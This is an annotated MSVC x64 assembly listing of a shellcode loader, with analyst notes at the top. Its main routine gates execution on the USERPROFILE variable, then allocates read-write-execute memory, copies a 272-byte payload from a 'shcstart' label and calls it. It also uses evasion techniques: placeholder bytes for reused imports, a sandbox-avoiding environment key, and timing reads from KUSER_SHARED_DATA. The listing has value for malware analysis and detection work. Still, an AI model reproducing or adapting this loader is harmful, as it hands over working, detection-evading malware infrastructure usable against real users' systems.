; Listing generated by Microsoft (R) Optimizing Compiler Version 19.37.32822.0
;
; -----------------------------------------------------------------------
; Review summary (MASM syntax, Microsoft x64 ABI: args in rcx, rdx, r8, r9)
;
; Compiler listing for Verify_1\main.c, built /Odtp (unoptimized). The
; listing appears to have been post-processed: the INCLUDELIB/EXTRN lines
; are commented out, three spots in main hold raw DB bytes where a data
; reference or API call would be, an AlignRSP entry stub precedes the
; compiled code, and a shcstart label is appended after the last PROC.
;
; What main does, as visible below:
;   1. Copies the UTF-16 strings "USERPROFILE" and "C:\Users\hacker"
;      onto the stack.
;   2. Reads the USERPROFILE environment variable into a stack buffer.
;   3. Compares the value with "C:\Users\hacker" using mystrcmp; on a
;      failed read or a mismatch it returns 6 without doing anything else.
;   4. Otherwise allocates 272 bytes with protection 0x40
;      (PAGE_EXECUTE_READWRITE), copies 272 bytes from shcstart into the
;      allocation, and calls the allocation.
;
; Notes for analysts:
;   - Execution is keyed to the environment: on a host whose USERPROFILE
;     does not pass the comparison, only the early-exit path (eax = 6)
;     runs, so dynamic analysis there never reaches the allocation.
;   - The observable runtime pattern on the matching path is a private
;     read/write/execute allocation that is written and then called.
;   - No import is declared in this listing (EXTRNs are commented out).
;   - get_time_raw derives time from fixed KUSER_SHARED_DATA addresses
;     with no API call, so API-call tracing does not show that source.
; -----------------------------------------------------------------------

include listing.inc

; INCLUDELIB LIBCMT
; INCLUDELIB OLDNAMES

_DATA   SEGMENT
; Communal QWORD; not referenced anywhere else in this listing.
COMM    supermega_payload:QWORD
_DATA   ENDS

PUBLIC  get_time_raw
PUBLIC  sleep_ms
PUBLIC  main
PUBLIC  mystrcmp

; Import declarations are disabled; the matching call sites in main are
; DB byte runs labelled "IAT Reuse".
; EXTRN __imp_GetEnvironmentVariableW:PROC
; EXTRN __imp_VirtualAlloc:PROC

_DATA   SEGMENT
; UTF-16LE "USERPROFILE" plus terminator: 11 chars + NUL = 24 bytes.
$SG72751 DB 'U', 00H, 'S', 00H, 'E', 00H, 'R', 00H, 'P', 00H, 'R', 00H
        DB 'O', 00H, 'F', 00H, 'I', 00H, 'L', 00H, 'E', 00H, 00H, 00H
; UTF-16LE "C:\Users\hacker" plus terminator: 15 chars + NUL = 32 bytes.
$SG72752 DB 'C', 00H, ':', 00H, '\', 00H, 'U', 00H, 's', 00H, 'e', 00H
        DB 'r', 00H, 's', 00H, '\', 00H, 'h', 00H, 'a', 00H, 'c', 00H, 'k'
        DB 00H, 'e', 00H, 'r', 00H, 00H, 00H
_DATA   ENDS

PUBLIC  AlignRSP

_TEXT   SEGMENT
;-----------------------------------------------------------------------
; AlignRSP - entry stub: forces 16-byte stack alignment, then calls main.
; In:    nothing read from registers
; Clobb: rsp (low 4 bits cleared; the previous value is not saved)
; Note:  there is no ret after the call, so the stub does not return to
;        its caller; if main returns, execution continues with whatever
;        bytes follow this PROC.
;-----------------------------------------------------------------------
AlignRSP PROC
        and     rsp, 0FFFFFFFFFFFFFFF0h ; Align RSP to 16 bytes
        call    main                    ; Call the entry point of the payload
AlignRSP ENDP
_TEXT   ENDS

_TEXT   SEGMENT
; Stack slots (offsets from rsp after "sub rsp, 24"):
i$ = 0                                  ; loop index, 32-bit signed
str1$ = 32                              ; home slot of rcx (24 + 8)
str2$ = 40                              ; home slot of rdx (24 + 16)
;-----------------------------------------------------------------------
; mystrcmp(str1, str2) - compare two strings of 16-bit elements.
; ABI:   Microsoft x64
; In:    rcx = str1, rdx = str2 (both indexed as WORD arrays)
; Out:   eax = 1 at the first index where the elements differ;
;        eax = 0 as soon as EITHER string has a zero element at the
;        current index. A string and any prefix of it therefore compare
;        as equal (including an empty string against anything).
; Clobb: rax, rcx, rdx, flags
; Note:  no length bound; both inputs must be zero-terminated.
;-----------------------------------------------------------------------
mystrcmp PROC
; File C:\Users\hacker\source\repos\supermega\projects\Verify_1\main.c
; Line 58
$LN6:
        mov     QWORD PTR [rsp+16], rdx ; home str2 into caller's shadow space
        mov     QWORD PTR [rsp+8], rcx  ; home str1 into caller's shadow space
        sub     rsp, 24
; Line 59
        mov     DWORD PTR i$[rsp], 0    ; i = 0
$LN2@mystrcmp:
; Line 60
        ; Loop condition: str1[i] != 0 && str2[i] != 0
        movsxd  rax, DWORD PTR i$[rsp]
        mov     rcx, QWORD PTR str1$[rsp]
        movzx   eax, WORD PTR [rcx+rax*2]
        test    eax, eax
        je      SHORT $LN3@mystrcmp     ; str1 ended -> report equal
        movsxd  rax, DWORD PTR i$[rsp]
        mov     rcx, QWORD PTR str2$[rsp]
        movzx   eax, WORD PTR [rcx+rax*2]
        test    eax, eax
        je      SHORT $LN3@mystrcmp     ; str2 ended -> report equal
; Line 61
        ; if (str1[i] != str2[i]) return 1
        movsxd  rax, DWORD PTR i$[rsp]
        mov     rcx, QWORD PTR str1$[rsp]
        movzx   eax, WORD PTR [rcx+rax*2]
        movsxd  rcx, DWORD PTR i$[rsp]
        mov     rdx, QWORD PTR str2$[rsp]
        movzx   ecx, WORD PTR [rdx+rcx*2]
        cmp     eax, ecx
        je      SHORT $LN4@mystrcmp
; Line 62
        mov     eax, 1                  ; mismatch
        jmp     SHORT $LN1@mystrcmp
$LN4@mystrcmp:
; Line 64
        mov     eax, DWORD PTR i$[rsp]
        inc     eax
        mov     DWORD PTR i$[rsp], eax  ; i++
; Line 65
        jmp     SHORT $LN2@mystrcmp
$LN3@mystrcmp:
; Line 66
        xor     eax, eax                ; return 0
$LN1@mystrcmp:
; Line 67
        add     rsp, 24
        ret     0
mystrcmp ENDP
_TEXT   ENDS

; Function compile flags: /Odtp
_TEXT   SEGMENT
; Stack slots (offsets from rsp after "sub rsp, 2168"):
n$1 = 32                                ; copy-loop index
result$ = 36                            ; return value of the environment read
dest$ = 40                              ; pointer returned by the allocation
envVarName$ = 48                        ; 24-byte copy of $SG72751
tocheck$ = 72                           ; 32-byte copy of $SG72752
buffer$ = 112                           ; receives the USERPROFILE value
;-----------------------------------------------------------------------
; main - environment check, then allocate / copy / call.
; ABI:   Microsoft x64
; Out:   eax = 6 if the environment read returns 0 or the comparison
;              reports a mismatch;
;        eax = 0 after the copied bytes have been called and returned.
; Saves: rsi, rdi (pushed/popped; used by rep movsb and the copy loop)
; Note:  the three DB runs below are not instruction encodings that
;        match their trailing comments. They look like marker bytes that
;        a later build step replaces (a load of rcx for the ".rdata
;        Reuse" ones, an indirect call for the "IAT Reuse" ones)
;        - TODO confirm against the tool that consumes this listing.
;-----------------------------------------------------------------------
main    PROC
; File C:\Users\hacker\source\repos\supermega\projects\Verify_1\main.c
; Line 23
$LN8:
        push    rsi
        push    rdi
        sub     rsp, 2168               ; 00000878H
; Line 29
        ; Copy "USERPROFILE" (24 bytes) into envVarName on the stack.
        lea     rax, QWORD PTR envVarName$[rsp]
        DB 024H, 0d1H, 0b7H, 05aH, 004H, 04cH, 020H ; .rdata Reuse for $SG72751 (rcx)
        mov     rdi, rax
        mov     rsi, rcx                ; rcx is expected to hold the string address here
        mov     ecx, 24
        rep movsb
; Line 30
        ; Copy "C:\Users\hacker" (32 bytes) into tocheck on the stack.
        lea     rax, QWORD PTR tocheck$[rsp]
        DB 01cH, 088H, 026H, 0deH, 0f0H, 0d2H, 0d4H ; .rdata Reuse for $SG72752 (rcx)
        mov     rdi, rax
        mov     rsi, rcx                ; rcx is expected to hold the string address here
        mov     ecx, 32                 ; 00000020H
        rep movsb
; Line 32
        ; result = GetEnvironmentVariableW(envVarName, buffer, 1024)
        mov     r8d, 1024               ; 00000400H
        lea     rdx, QWORD PTR buffer$[rsp]
        lea     rcx, QWORD PTR envVarName$[rsp]
        DB 06fH, 0c8H, 0f2H, 0e0H, 041H, 089H ; IAT Reuse for GetEnvironmentVariableW
        mov     DWORD PTR result$[rsp], eax
; Line 33
        cmp     DWORD PTR result$[rsp], 0
        jne     SHORT $LN5@main
; Line 34
        mov     eax, 6                  ; read returned 0 -> exit with 6
        jmp     SHORT $LN1@main
$LN5@main:
; Line 36
        ; Environment check: mystrcmp(buffer, tocheck). Because mystrcmp
        ; stops at the first terminator in either string, this accepts
        ; any value that is a prefix of, or is prefixed by, tocheck.
        lea     rdx, QWORD PTR tocheck$[rsp]
        lea     rcx, QWORD PTR buffer$[rsp]
        call    mystrcmp
        test    eax, eax
        je      SHORT $LN6@main
; Line 37
        mov     eax, 6                  ; mismatch -> exit with 6
        jmp     SHORT $LN1@main
$LN6@main:
; Line 42
        ; dest = VirtualAlloc(NULL, 272, 0x3000, 0x40)
        ;   0x3000 = MEM_COMMIT | MEM_RESERVE
        ;   0x40   = PAGE_EXECUTE_READWRITE
        mov     r9d, 64                 ; 00000040H
        mov     r8d, 12288              ; 00003000H
        mov     edx, 272                ; 00000110H
        xor     ecx, ecx
        DB 078H, 00eH, 02fH, 0edH, 0fbH, 0c4H ; IAT Reuse for VirtualAlloc
        mov     QWORD PTR dest$[rsp], rax ; stored without a NULL check
; Line 47
        ; for (n = 0; n < 272; n++) dest[n] = shcstart[n]
        mov     DWORD PTR n$1[rsp], 0
        jmp     SHORT $LN4@main
$LN2@main:
        mov     eax, DWORD PTR n$1[rsp]
        inc     eax
        mov     DWORD PTR n$1[rsp], eax
$LN4@main:
        cmp     DWORD PTR n$1[rsp], 272 ; 00000110H
        jge     SHORT $LN3@main
; Line 48
        movsxd  rax, DWORD PTR n$1[rsp]
        movsxd  rcx, DWORD PTR n$1[rsp]
        mov     rdx, QWORD PTR dest$[rsp]
        lea     rdi, [shcstart]         ; get payload shellcode address
        movzx   eax, BYTE PTR [rdi+rax]
        mov     BYTE PTR [rdx+rcx], al
; Line 49
        jmp     SHORT $LN2@main
$LN3@main:
; Line 53
        ; Transfer control to the freshly written allocation.
        call    QWORD PTR dest$[rsp]
; Line 55
        xor     eax, eax
$LN1@main:
; Line 56
        add     rsp, 2168               ; 00000878H
        pop     rdi
        pop     rsi
        ret     0
main    ENDP
_TEXT   ENDS

; Function compile flags: /Odtp
_TEXT   SEGMENT
; Stack slots (offsets from rsp after "sub rsp, 56"):
start$ = 32                             ; time value sampled on entry
sleeptime$ = 64                         ; home slot of ecx (56 + 8)
;-----------------------------------------------------------------------
; sleep_ms(sleeptime) - busy-wait on get_time_raw.
; ABI:   Microsoft x64
; In:    ecx = sleeptime (same unit as get_time_raw; presumably
;              milliseconds, going by the name - TODO confirm)
; Out:   none
; Spins until (get_time_raw() - start) >= sleeptime, compared unsigned.
; No API call or yield happens while waiting. main does not call this
; function in this listing.
;-----------------------------------------------------------------------
sleep_ms PROC
; File C:\Users\hacker\source\repos\supermega\projects\Verify_1\main.c
; Line 17
$LN5:
        mov     DWORD PTR [rsp+8], ecx  ; home sleeptime into shadow space
        sub     rsp, 56                 ; 00000038H
; Line 18
        call    get_time_raw
        mov     DWORD PTR start$[rsp], eax
$LN2@sleep_ms:
; Line 19
        call    get_time_raw
        sub     eax, DWORD PTR start$[rsp]
        cmp     eax, DWORD PTR sleeptime$[rsp]
        jae     SHORT $LN3@sleep_ms     ; elapsed >= sleeptime (unsigned) -> done
        jmp     SHORT $LN2@sleep_ms
$LN3@sleep_ms:
; Line 20
        add     rsp, 56                 ; 00000038H
        ret     0
sleep_ms ENDP
_TEXT   ENDS

; Function compile flags: /Odtp
_TEXT   SEGMENT
; Stack slots (offsets from rsp after "sub rsp, 40"):
kernelTime$ = 0
PUserSharedData_TickCountMultiplier$ = 8
PUserSharedData_High1Time$ = 16
PUserSharedData_LowPart$ = 24
;-----------------------------------------------------------------------
; get_time_raw - read a time value straight from fixed addresses.
; ABI:   Microsoft x64
; Out:   eax = (uint32)( ((High1Time << 8) * Multiplier, 32-bit)
;                        + ((LowPart * Multiplier, 64-bit) >> 24) )
; Clobb: rax, rcx, rdx, flags
; The three hard-coded addresses 7ffe0004H, 7ffe0320H and 7ffe0324H lie
; in the user-mode mapping of KUSER_SHARED_DATA at 7ffe0000H; the local
; names identify them as TickCountMultiplier and the LowPart/High1Time
; halves of a tick count. The arithmetic looks like a tick-count-to-
; milliseconds conversion - TODO confirm the unit. Only memory reads are
; performed; no API is called.
;-----------------------------------------------------------------------
get_time_raw PROC
; File C:\Users\hacker\source\repos\supermega\projects\Verify_1\main.c
; Line 7
$LN3:
        sub     rsp, 40                 ; 00000028H
; Line 8
        mov     QWORD PTR PUserSharedData_TickCountMultiplier$[rsp], 2147352580 ; 7ffe0004H
; Line 9
        mov     QWORD PTR PUserSharedData_High1Time$[rsp], 2147353380 ; 7ffe0324H
; Line 10
        mov     QWORD PTR PUserSharedData_LowPart$[rsp], 2147353376 ; 7ffe0320H
; Line 11
        ; eax = (High1Time << 8) * Multiplier, truncated to 32 bits
        mov     rax, QWORD PTR PUserSharedData_High1Time$[rsp]
        mov     eax, DWORD PTR [rax]
        shl     eax, 8
        mov     rcx, QWORD PTR PUserSharedData_TickCountMultiplier$[rsp]
        mov     ecx, DWORD PTR [rcx]
        imul    ecx, eax
        mov     eax, ecx
        mov     eax, eax                ; zero-extend the 32-bit product into rax
        ; rcx = ((uint64)LowPart * Multiplier) >> 24
        mov     rcx, QWORD PTR PUserSharedData_LowPart$[rsp]
        mov     ecx, DWORD PTR [rcx]
        mov     rdx, QWORD PTR PUserSharedData_TickCountMultiplier$[rsp]
        mov     edx, DWORD PTR [rdx]
        imul    rcx, rdx
        shr     rcx, 24
        add     rax, rcx
        mov     DWORD PTR kernelTime$[rsp], eax ; keep only the low 32 bits
; Line 13
        mov     eax, DWORD PTR kernelTime$[rsp]
; Line 14
        add     rsp, 40                 ; 00000028H
        ret     0
get_time_raw ENDP

; main copies 272 bytes starting at this label. No bytes follow it in
; this listing, so the content is presumably appended after assembly
; - TODO confirm.
shcstart:                               ; start of payload shellcode
_TEXT   ENDS
END